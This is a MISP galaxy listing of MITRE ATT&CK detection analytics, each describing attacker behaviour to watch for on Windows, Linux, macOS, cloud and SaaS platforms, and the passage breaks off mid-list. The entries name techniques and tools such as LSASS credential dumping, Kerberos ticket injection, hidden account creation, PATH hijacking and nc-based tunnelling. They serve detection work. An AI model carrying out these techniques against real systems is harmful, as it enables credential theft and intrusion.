Skip to content

Hide Navigation Hide TOC

Edit

Analytics

ATT&CK Analytics

Authors
Authors and/or Contributors
MITRE

Analytic 0010 - AN0010

User modification of the $PATH environment variable in shell configuration files or direct runtime PATH changes, followed by execution of binaries from user-controlled directories. Defender observes file edits to ~/.bashrc, ~/.profile, or /etc/paths.d and process execution resolving to unexpected binary locations.

Internal MISP references

UUID 00b5d9a8-a794-4d7c-90df-71c4021e0a46 which can be used as unique global reference for Analytic 0010 - AN0010 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0010
mitre_platforms ['Linux']

Analytic 0100 - AN0100

Suspicious processes initiating encrypted HTTPS connections to common web service domains, followed by abnormal data upload behavior or automated posting behavior indicative of C2 bidirectional traffic.

Internal MISP references

UUID 27bd3e33-9a61-4dfb-9fba-205a6c880264 which can be used as unique global reference for Analytic 0100 - AN0100 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0100
mitre_platforms ['Windows']

Analytic 1000 - AN1000

Detects unauthorized Kerberos ticket injection by correlating service ticket (TGS - 4769) requests with absent corresponding account logons (4624) and prior Ticket Granting Ticket (TGT - 4768) activity. Highlights anomalous service ticket generation chains involving unexpected users, hosts, or times, and suspicious injection of tickets via mimikatz-like tooling into LSASS memory. Behavior also includes network lateral movement using Kerberos authentication absent expected interactive logon patterns.

Internal MISP references

UUID 54ffc701-eb6c-4e3e-8615-0c6f8b327a34 which can be used as unique global reference for Analytic 1000 - AN1000 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1000
mitre_platforms ['Windows']

Analytic 0001 - AN0001

Detects access attempts to cloud instance metadata endpoints (e.g., 169.254.169.254) from virtual machines or containerized workloads. This includes both direct access and SSRF exploitation patterns.

Internal MISP references

UUID f4af0b1b-db51-4266-8b02-2cdfcb191f60 which can be used as unique global reference for Analytic 0001 - AN0001 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0001
mitre_platforms ['IaaS']

Analytic 2000 - AN2000

Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).

Internal MISP references

UUID 56622fce-489a-4ed9-b1fb-e525939667d4 which can be used as unique global reference for Analytic 2000 - AN2000 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2000
mitre_platforms ['PRE']

Analytic 0200 - AN0200

Abuse of systemctl to execute commands or manage systemd services. Defender perspective: correlate suspicious service creation or modification with execution of systemctl subcommands such as start, enable, or status. Detect cases where systemctl is used to load services from unusual locations (e.g., /tmp, /dev/shm) or where new service units are created outside of expected administrative workflows.

Internal MISP references

UUID 756d5795-ef61-4115-80d2-f2e7440dff56 which can be used as unique global reference for Analytic 0200 - AN0200 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0200
mitre_platforms ['Linux']

Analytic 0002 - AN0002

Detects non-standard processes (e.g., PowerShell, python.exe, rundll32.exe) making outbound connections using publish/subscribe protocols (e.g., MQTT, AMQP) over non-browser, encrypted channels, often beaconing to message brokers.

Internal MISP references

UUID ee4e3e61-e138-498b-93bf-3a5f8fea691c which can be used as unique global reference for Analytic 0002 - AN0002 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0002
mitre_platforms ['Windows']

Analytic 0020 - AN0020

Remote access to third-party SaaS with OAuth or API tokens post-initial compromise, followed by sensitive data access or configuration changes

Internal MISP references

UUID fb23f9ee-cdc8-46be-8f40-3631afbaff5a which can be used as unique global reference for Analytic 0020 - AN0020 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0020
mitre_platforms ['SaaS']

Analytic 0030 - AN0030

Processes generating large outbound connections with disproportionate send/receive ratios, often to uncommon ports or hosts, potentially inserting meaningless data into protocol payloads.

Internal MISP references

UUID 3e852bb9-785d-4bc4-9f7e-b7e43a5d8bc8 which can be used as unique global reference for Analytic 0030 - AN0030 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0030
mitre_platforms ['Windows']

Analytic 0003 - AN0003

Detects CLI tools (e.g., mosquitto_pub, nc, python scripts) interacting with pub/sub brokers using unusual topic names, high-frequency publication rates, or obfuscated payloads to non-standard hosts.

Internal MISP references

UUID 3ecc4ba2-bf4f-481c-b813-69c169c28c83 which can be used as unique global reference for Analytic 0003 - AN0003 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0003
mitre_platforms ['Linux']

Analytic 0300 - AN0300

Correlation of Mail.app logs with Safari/Chrome activity. Suspicious behavior includes email links → Safari/Chrome accessing newly registered or lookalike domains → osascript or Terminal spawned unexpectedly.

Internal MISP references

UUID b18b93d1-3f63-4788-8e26-68db032995e0 which can be used as unique global reference for Analytic 0300 - AN0300 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0300
mitre_platforms ['macOS']

Analytic 0004 - AN0004

Detects osascript, curl, or custom binaries interacting with XMPP/MQTT brokers in unapproved destinations with encrypted payloads or frequent POST-like requests to broker URIs.

Internal MISP references

UUID 131d3f89-e10d-4ac9-a9d0-fcb4e8e8760a which can be used as unique global reference for Analytic 0004 - AN0004 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0004
mitre_platforms ['macOS']

Analytic 0400 - AN0400

Processes that typically do not perform cryptographic operations loading symmetric encryption libraries (e.g., bcryptprimitives.dll, aes.dll), then initiating outbound connections with high-entropy payloads. Defender correlates process creation, DLL load, and anomalous encrypted traffic patterns.

Internal MISP references

UUID 704bd588-a82b-4139-92ef-6dc6a48581c8 which can be used as unique global reference for Analytic 0400 - AN0400 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0400
mitre_platforms ['Windows']

Analytic 0040 - AN0040

Detects staging of sensitive files into temporary or public directories, compression with 7zip/WinRAR, or batch copy prior to exfiltration.

Internal MISP references

UUID 7cb2010a-e502-4117-94f3-fa3bd8d64a34 which can be used as unique global reference for Analytic 0040 - AN0040 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0040
mitre_platforms ['Windows']

Analytic 0500 - AN0500

Correlated evidence where Safari/Chrome/WebKit-based processes issue network requests for uncommon or obfuscated JS resources followed by spawning of script interpreters, launchd or ad-hoc binaries, unusual child processes, or dynamic library loads into browser processes. Defender sees: proxy/HTTP logs with suspicious resource content + unifiedlogs/ASL showing browser/plugin crashes or extension loads + process events indicating child process creation and file writes to /var/folders or /tmp shortly after the fetch.

Internal MISP references

UUID 230a55ce-4584-4588-a006-5532a9efdbd8 which can be used as unique global reference for Analytic 0500 - AN0500 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0500
mitre_platforms ['macOS']

Analytic 0005 - AN0005

Detects pub/sub traffic over unusual ports, high-frequency topic publications, and connections to known-bad or dynamic broker endpoints outside allowlisted infrastructure.

Internal MISP references

UUID 748f457a-5dfa-431b-b5a0-3d5e1d56ebbb which can be used as unique global reference for Analytic 0005 - AN0005 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0005
mitre_platforms ['Network Devices']

Analytic 0050 - AN0050

Adversary attempts to detect monitoring agents such as Little Snitch, KnockKnock, or other system daemons via process listing (ps -e), application folder checks, and system extension listing.

Internal MISP references

UUID 9d76d84b-6393-45cf-b872-eb5921508ee3 which can be used as unique global reference for Analytic 0050 - AN0050 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0050
mitre_platforms ['macOS']

Analytic 0060 - AN0060

Correlates zsh shell configuration file changes (e.g., ~/.zshrc, ~/.zlogin, /etc/zprofile) with execution of unauthorized binaries or unexpected network activity triggered on Terminal.app launch.

Internal MISP references

UUID 6acf01f9-723e-499b-8774-3fa689a36ded which can be used as unique global reference for Analytic 0060 - AN0060 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0060
mitre_platforms ['macOS']

Analytic 0006 - AN0006

Adversary uses built-in tools such as 'net user /add /domain' or PowerShell to create a domain user account. The behavior chain includes: (1) suspicious process execution on a domain controller followed by (2) user account creation event (Event ID 4720) on the same host.

Internal MISP references

UUID 86103b48-cd6d-447d-aef4-807e10355506 which can be used as unique global reference for Analytic 0006 - AN0006 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0006
mitre_platforms ['Windows']

Analytic 0600 - AN0600

Detection of shell scripts, ELF binaries, or archives containing embedded secondary payloads, self-extracting components, or unusual compression behavior during runtime.

Internal MISP references

UUID db9b55b0-7e54-4625-92d5-fbe9ed8ac868 which can be used as unique global reference for Analytic 0600 - AN0600 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0600
mitre_platforms ['Linux']

Analytic 0070 - AN0070

Detects abnormal interaction with memory-based Kerberos ccache (API:{uuid}) or file-based overrides. Focus on processes attempting to enumerate or extract Kerberos tickets outside of built-in utilities. Detects use of open-source tools (e.g., Bifrost, modified Mimikatz ports) that interact with the Kerberos framework APIs.

Internal MISP references

UUID 2a9d296d-6b36-42de-870c-9d851c0471ed which can be used as unique global reference for Analytic 0070 - AN0070 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0070
mitre_platforms ['macOS']

Analytic 0700 - AN0700

Execution of Homebrew, pip3, npm, or manually downloaded PKGs from Terminal or shell, followed by the creation of startup agents, interpreter spawns, or outbound connections to unfamiliar domains. Defender links Terminal commands to plist creation, unsigned binary launches, and python3 or node processes connecting to remote endpoints.

Internal MISP references

UUID 98f18ad5-0def-4ac3-8822-7538f0a8d64d which can be used as unique global reference for Analytic 0700 - AN0700 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0700
mitre_platforms ['macOS']

Analytic 0007 - AN0007

Adversary with access to domain management tools (e.g., realmd, samba-tool, ldapmodify) creates a new domain user via command-line utilities. Behavior chain: LDAP command or script triggers → user entry added in AD via Kerberos/LDAP traffic.

Internal MISP references

UUID e86081ab-aad1-48a1-abd8-5a5c8c7c936a which can be used as unique global reference for Analytic 0007 - AN0007 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0007
mitre_platforms ['Linux']

Analytic 0008 - AN0008

macOS clients joined to AD via LDAP may script account provisioning via dsconfigad, dscl, or LDAP scripts. Detection occurs when such tools run on a domain-joined system, followed by authentication attempts by a previously unseen account.

Internal MISP references

UUID 03513eb2-6dbd-4160-94dd-25d2bce349be which can be used as unique global reference for Analytic 0008 - AN0008 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0008
mitre_platforms ['macOS']

Analytic 0800 - AN0800

Correlates suspicious removal or modification of the com.apple.quarantine extended attribute, manipulation of LSFileQuarantineEnabled values in Info.plist, and unexpected process execution of unsigned or non-notarized binaries. Also monitors abnormal trust validation failures in unified logs and unusual activity in QuarantineEvents database entries.

Internal MISP references

UUID b6516e8b-fd18-4c92-8701-1762d8321168 which can be used as unique global reference for Analytic 0800 - AN0800 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0800
mitre_platforms ['macOS']

Analytic 0080 - AN0080

Processes invoking network-intensive child processes or uploading large data volumes, often from non-standard user or system contexts, with evidence of long-duration TCP/UDP sessions to unusual destinations.

Internal MISP references

UUID c699a4ee-83dd-48d8-94ae-658204066ae9 which can be used as unique global reference for Analytic 0080 - AN0080 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0080
mitre_platforms ['Windows']

Analytic 0090 - AN0090

Binaries or applications executed with tampered or unverifiable code signatures. Often tied to Gatekeeper bypasses, App Translocation, or use of unsigned launch daemons by untrusted users.

Internal MISP references

UUID 35d9b6e6-aed8-4e9e-b6ee-e683d9c17fd0 which can be used as unique global reference for Analytic 0090 - AN0090 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0090
mitre_platforms ['macOS']

Analytic 0900 - AN0900

Adversaries use cloud API, CLI, or console to create IAM users or roles. Initial CreateUser is followed by policy/role attachment. Detection monitors temporal chains involving IAM:CreateUser, AttachUserPolicy, and credential generation, especially from automation or foreign IP ranges.

Internal MISP references

UUID 4264c6fb-20b2-4792-8939-c7d8f204338a which can be used as unique global reference for Analytic 0900 - AN0900 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0900
mitre_platforms ['IaaS']

Analytic 0009 - AN0009

Abnormal modification of the PATH environment variable or registry keys controlling system paths, combined with execution of binaries named after legitimate system tools from user-writable directories. Defender correlates registry modifications, file creation of suspicious binaries, and process execution paths inconsistent with baseline system directories.

Internal MISP references

UUID bbd003ec-4208-48bb-9ad5-b9dd627fdd14 which can be used as unique global reference for Analytic 0009 - AN0009 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0009
mitre_platforms ['Windows']

Analytic 0110 - AN0110

Monitor /var/log/audit/audit.log and DNS resolver logs for repeated failed lookups or connections to high-entropy domain names. Correlate suspicious DNS queries with process lineage (e.g., Python, bash, or unusual system daemons).

Internal MISP references

UUID 00112bcc-174f-4201-ac81-fe3edd1292e6 which can be used as unique global reference for Analytic 0110 - AN0110 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0110
mitre_platforms ['Linux']

Analytic 0101 - AN0101

Non-interactive system processes making encrypted HTTPS connections to well-known web services followed by high outbound traffic volume or scripted upload patterns.

Internal MISP references

UUID 1edab644-3ec0-4c5d-bc26-18744fbc7a6e which can be used as unique global reference for Analytic 0101 - AN0101 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0101
mitre_platforms ['Linux']

Analytic 1001 - AN1001

Registry modifications to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList setting user visibility to 0, or creation of user accounts not shown on login screen. Defender view: correlation of account creation with registry edits that mark users hidden.

Internal MISP references

UUID 6039c777-6a85-4df4-86b9-40d95796046e which can be used as unique global reference for Analytic 1001 - AN1001 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1001
mitre_platforms ['Windows']

Analytic 1010 - AN1010

Detect abnormal use of email clients (e.g., Outlook, Thunderbird) showing mass arrival of messages or repetitive attachments being locally stored. Correlate message volume with file creation activity in mail cache directories.

Internal MISP references

UUID 7e9cb99b-4040-4b73-bd70-1bd68ae0f373 which can be used as unique global reference for Analytic 1010 - AN1010 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1010
mitre_platforms ['Office Suite']

Analytic 0011 - AN0011

Modification of PATH or HOME environment variables through shell config files, launchctl, or /etc/paths.d entries, combined with process execution from attacker-controlled directories. Defender correlates file changes in /etc/paths.d with process execution resolving to malicious binaries.

Internal MISP references

UUID b2261c7f-664b-400c-b8ba-8b5bc3bac75a which can be used as unique global reference for Analytic 0011 - AN0011 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0011
mitre_platforms ['macOS']

Analytic 1100 - AN1100

Adversary spawns a process or script to enumerate installed software using WMI, registry, or PowerShell, potentially followed by additional discovery or evasion behavior.

Internal MISP references

UUID c0bbe0a5-680f-487b-8f5f-27703efb52b7 which can be used as unique global reference for Analytic 1100 - AN1100 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1100
mitre_platforms ['Windows']

Analytic 1020 - AN1020

Suspicious processes (e.g., Tor clients, relays, unknown binaries) launch with sustained encrypted outbound traffic to known anonymity infrastructure (e.g., Tor, I2P), and may relay to additional internal systems via reverse proxying, ICMP tunneling, or socket forwarding.

Internal MISP references

UUID 128315ea-6407-4c28-8528-209e799ad8e1 which can be used as unique global reference for Analytic 1020 - AN1020 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1020
mitre_platforms ['Windows']

Analytic 1200 - AN1200

Monitors Keychain database access and suspicious invocations of security and osascript utilities. Correlates process execution with attempts to dump or unlock Keychain data.

Internal MISP references

UUID 2bec56a7-957c-44b4-b730-00dd55ff99f8 which can be used as unique global reference for Analytic 1200 - AN1200 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1200
mitre_platforms ['macOS']

Analytic 1002 - AN1002

Use of gsettings or direct Display Manager modifications to hide users from greeter login screen. Defender view: anomalous command execution modifying org.gnome.login-screen or other greeter configurations.

Internal MISP references

UUID 397a553d-c08d-497e-8fb0-9526f5a205bc which can be used as unique global reference for Analytic 1002 - AN1002 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1002
mitre_platforms ['Linux']

Analytic 0102 - AN0102

Scripting engines (e.g., osascript, Python) initiating HTTPS requests to social media or content-sharing platforms, paired with automated response handling indicative of two-way communication.

Internal MISP references

UUID 5935bda3-8d4d-44b4-aca4-8b40cf45f686 which can be used as unique global reference for Analytic 0102 - AN0102 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0102
mitre_platforms ['macOS']

Analytic 0210 - AN0210

Detects embedded or emulated VBScript/VBA execution via Wine-based apps, Office for Mac abusing cross-platform .NET features, or macros dropped and invoked via AppleScript or third-party automation tools.

Internal MISP references

UUID 668bc76f-04cc-4274-8a66-cfa00e83ef14 which can be used as unique global reference for Analytic 0210 - AN0210 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0210
mitre_platforms ['macOS']

Analytic 0201 - AN0201

Anomalous access to cloud web applications using session tokens without corresponding MFA/credential validation, often from unusual locations or device fingerprints.

Internal MISP references

UUID 8d43ac43-de80-4815-b992-6f49519ed340 which can be used as unique global reference for Analytic 0201 - AN0201 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0201
mitre_platforms ['IaaS']

Analytic 2010 - AN2010

Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) Monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links and identifying obfuscated URLs) can also help detect links leading to known malicious sites.(Citation: Mandiant URL Obfuscation 2023)

Furthermore, monitor browser logs for homographs in ASCII and in internationalized domain names abusing different character sets (e.g. Cyrillic vs Latin versions of trusted sites). Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Monitor and analyze traffic patterns and packet inspection associated to protocol(s), leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).

Furthermore, monitor network traffic for homographs via the use of internationalized domain names abusing different character sets (e.g. Cyrillic vs Latin versions of trusted sites). Also monitor and analyze traffic patterns and packet inspection for indicators of cloned websites. For example, if adversaries use HTTrack to clone websites, Mirrored from (victim URL) may be visible in the HTML section of packets.

Internal MISP references

UUID 985e0098-b77c-4099-a262-5f195b654187 which can be used as unique global reference for Analytic 2010 - AN2010 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2010
mitre_platforms ['PRE']

Analytic 0021 - AN0021

Adversary manipulates dependencies/dev tools used by developers or CI: a package manager (npm/yarn/pnpm, pip/pipenv, nuget/dotnet, chocolatey/winget, maven/gradle) or a compiler/IDE downloads or restores content; files are written under project paths and execution paths (node_modules, packages, .nuget, .gradle, .m2, %AppData%\npm, %UserProfile%.cargo\bin, temp build dirs). First run of newly written components triggers scripts (preinstall/postinstall), shell/PowerShell spawning, or loader DLLs, followed by network egress to non-approved registries/CDNs.

Internal MISP references

UUID 9ec9d296-173f-4e47-8bc4-d20d558e6e18 which can be used as unique global reference for Analytic 0021 - AN0021 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0021
mitre_platforms ['Windows']

Analytic 2001 - AN2001

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID ca1afe09-7edb-4415-a240-92a0f30ac22f which can be used as unique global reference for Analytic 2001 - AN2001 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2001
mitre_platforms ['PRE']

Analytic 0120 - AN0120

Detection of commands accessing locale, timezone, or language settings such as 'locale', 'timedatectl', or parsing /etc/timezone. Anomalous execution by unusual users or automation scripts should be flagged.

Internal MISP references

UUID d053d033-b587-4ed0-bdbc-0c6a9bdd7c82 which can be used as unique global reference for Analytic 0120 - AN0120 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0120
mitre_platforms ['Linux']

Analytic 0012 - AN0012

Execution of binaries where the on-disk filename does not match PE metadata such as OriginalFilename or InternalName. Often observed with renamed LOLBAS or system binaries like rundll32, powershell, or psexec.

Internal MISP references

UUID ec036273-4e90-465e-b115-a69bbb68dde4 which can be used as unique global reference for Analytic 0012 - AN0012 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0012
mitre_platforms ['Windows']

Analytic 0103 - AN0103

Adversary registers new devices to compromised user accounts to bypass MFA or conditional access policies via Azure Entra ID, Okta, or Duo self-enrollment portals.

Internal MISP references

UUID 108a10d2-4a9e-4c11-8a6f-42c8b60f0f52 which can be used as unique global reference for Analytic 0103 - AN0103 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0103
mitre_platforms ['Identity Provider']

Analytic 0130 - AN0130

Detection focuses on processes that attempt to locate, access, or exfiltrate local Outlook data files (.pst/.ost) using file system access, native Windows utilities (e.g., PowerShell, WMI), or remote access tools with file browsing capabilities. The behavior chain includes directory enumeration, file access, optional compression or staging, and network transfer.

Internal MISP references

UUID 11cd0577-97e6-4def-a86b-fe167ae4e33d which can be used as unique global reference for Analytic 0130 - AN0130 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0130
mitre_platforms ['Windows']

Analytic 1030 - AN1030

A non-privileged or abnormal process attempts to open a handle with full access (0x1F0FFF) to lsass.exe and subsequently invokes memory dump, file creation, or registry modification indicative of credential scraping. This behavior chain reflects staged credential theft activity.

Internal MISP references

UUID 2b0dd3b6-6949-4dd5-b0dd-7b0b6f431dbe which can be used as unique global reference for Analytic 1030 - AN1030 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1030
mitre_platforms ['Windows']

Analytic 0013 - AN0013

Execution of renamed or relocated native macOS utilities with uncommon names or non-default paths (e.g., renamed osascript, bash, or curl).

Internal MISP references

UUID 3349af7c-3cea-4424-b2a4-056fedb63831 which can be used as unique global reference for Analytic 0013 - AN0013 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0013
mitre_platforms ['macOS']

Analytic 1300 - AN1300

Detects modification of shared network folders via .app bundles or scripting files with hidden extensions (e.g., double extensions like docx.app).

Internal MISP references

UUID 3f36a861-3be2-4f6d-bfad-f044cdc01b15 which can be used as unique global reference for Analytic 1300 - AN1300 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1300
mitre_platforms ['macOS']

Analytic 0031 - AN0031

Outbound traffic with anomalous payload sizes and patterns from non-networking processes, often observed via packet inspection or connection logs.

Internal MISP references

UUID 4c7d92bb-4b46-44e4-b070-43c46d3193c4 which can be used as unique global reference for Analytic 0031 - AN0031 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0031
mitre_platforms ['Linux']

Analytic 0310 - AN0310

Detection monitors SaaS collaboration tools (e.g., Slack, Zoom, Jira) for messages or files containing credential-like patterns, or for suspicious API calls retrieving bulk chat histories by non-admin users. Identifies adversary behavior chains where chat logs are queried via APIs or integration bots to systematically extract sensitive material.

Internal MISP references

UUID bafd38ad-aebd-40f1-9f17-bd63a1c74ba9 which can be used as unique global reference for Analytic 0310 - AN0310 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0310
mitre_platforms ['SaaS']

Analytic 1003 - AN1003

User creation or modification via dscl with IsHidden=1, UID<500, or plist edits to com.apple.loginwindow Hide500Users flag. Defender view: correlation of hidden account attributes with login screen exclusion.

Internal MISP references

UUID cabc275f-5097-4d2e-aabe-b49a31ba87b9 which can be used as unique global reference for Analytic 1003 - AN1003 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1003
mitre_platforms ['macOS']

Analytic 0301 - AN0301

Detection of OAuth consent phishing or malicious login attempts initiated through spearphishing links. Behavior chain includes inbound email with OAuth URL → consent page visited → unusual token grants logged in IdP logs.

Internal MISP references

UUID cfc7b6bc-2ca3-4407-a835-b40bf6a98efc which can be used as unique global reference for Analytic 0301 - AN0301 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0301
mitre_platforms ['Identity Provider']

Analytic 0410 - AN0410

Detection of firewall ACL or rule base changes through CLI (e.g., no access-list, permit any any). Monitor configuration commits from unusual users or sessions.

Internal MISP references

UUID 1216ae5e-bc5c-4672-a216-2706fb9ba3df which can be used as unique global reference for Analytic 0410 - AN0410 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0410
mitre_platforms ['Network Devices']

Analytic 1400 - AN1400

Detects ptrace- or memfd-based process injection through audit logs capturing system calls (e.g., ptrace, mmap) targeting running processes along with suspicious file descriptors or memory writes.

Internal MISP references

UUID 61282e0a-3eae-4358-8821-6c8318961e24 which can be used as unique global reference for Analytic 1400 - AN1400 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1400
mitre_platforms ['Linux']

Analytic 1004 - AN1004

Unusual or unauthorized external remote access attempts (e.g., RDP, VPN, Citrix) → repeated failed logins followed by a successful session from uncommon geolocations or outside business hours → subsequent internal lateral movement or data exfiltration activities.

Internal MISP references

UUID 63583dcb-dbdc-4b9d-a261-3129de12327e which can be used as unique global reference for Analytic 1004 - AN1004 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1004
mitre_platforms ['Windows']

Analytic 1040 - AN1040

Execution of file enumeration commands (e.g., 'dir', 'tree') from non-standard processes or unusual user contexts, followed by recursive directory traversal or access to sensitive locations.

Internal MISP references

UUID 69d9d158-aa43-4b73-b9a4-f1a2dc6c13c1 which can be used as unique global reference for Analytic 1040 - AN1040 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1040
mitre_platforms ['Windows']

Analytic 0401 - AN0401

Unexpected processes (e.g., bash, python, custom binaries) dynamically loading libcrypto or performing AES/RC4 encryption operations, then initiating outbound sessions with abnormal byte entropy or asymmetric traffic patterns.

Internal MISP references

UUID 8c64bf26-bda2-47fc-867d-bcc6a51d57a7 which can be used as unique global reference for Analytic 0401 - AN0401 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0401
mitre_platforms ['Linux']

Analytic 0014 - AN0014

Execution of renamed common utilities (e.g., bash, nc, python, sh) from atypical directories or with names intended to deceive defenders or EDRs.

Internal MISP references

UUID bd8beea8-48c8-41dc-8991-f8c739d10c70 which can be used as unique global reference for Analytic 0014 - AN0014 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0014
mitre_platforms ['Linux']

Analytic 0104 - AN0104

Adversary registers a Windows device to Entra ID or bypasses conditional access by adding device via Intune registration pipeline using stolen credentials.

Internal MISP references

UUID d5dc64ab-bb69-4893-a155-84d403040e1a which can be used as unique global reference for Analytic 0104 - AN0104 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0104
mitre_platforms ['Windows']

Analytic 0041 - AN0041

Detects script or user activity copying files to a central temp or /mnt directory followed by archive/compression utilities.

Internal MISP references

UUID e9ee76c8-e959-4925-8f93-4b8fb66bc9f1 which can be used as unique global reference for Analytic 0041 - AN0041 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0041
mitre_platforms ['Linux']

Analytic 0140 - AN0140

Adversaries writing or moving payloads into directories configured as AV/EDR exclusion paths (e.g., /tmp, /var/lib, or custom directories from auditd exclusion rules). Defender perspective: detect file creation in paths matching known exclusions correlated with unusual parent processes.

Internal MISP references

UUID fd7bf05d-6f80-471c-99bf-7aa82ab25440 which can be used as unique global reference for Analytic 0140 - AN0140 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0140
mitre_platforms ['Linux']

Analytic 0150 - AN0150

Internal spearphishing via SaaS applications (e.g., Slack, Teams, Gmail): message sent from compromised user with attachment or URL, followed by click and credential access behavior.

Internal MISP references

UUID 1e2211b9-1730-4645-89f6-11259b35e0a4 which can be used as unique global reference for Analytic 0150 - AN0150 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0150
mitre_platforms ['SaaS']

Analytic 0501 - AN0501

Post-compromise identity & session anomalies that follow a drive-by compromise: token reuse from new/unfamiliar IPs, anomalous sign-in patterns for previously inactive users, unexpected consent/grant events, or provisioning changes. Defender sees an endpoint/browser compromise (network + endpoint signals) followed by unusual IdP events: new refresh token issuance, consent/consent-grant events, odd MFA bypass patterns, or unusual OAuth client registrations.

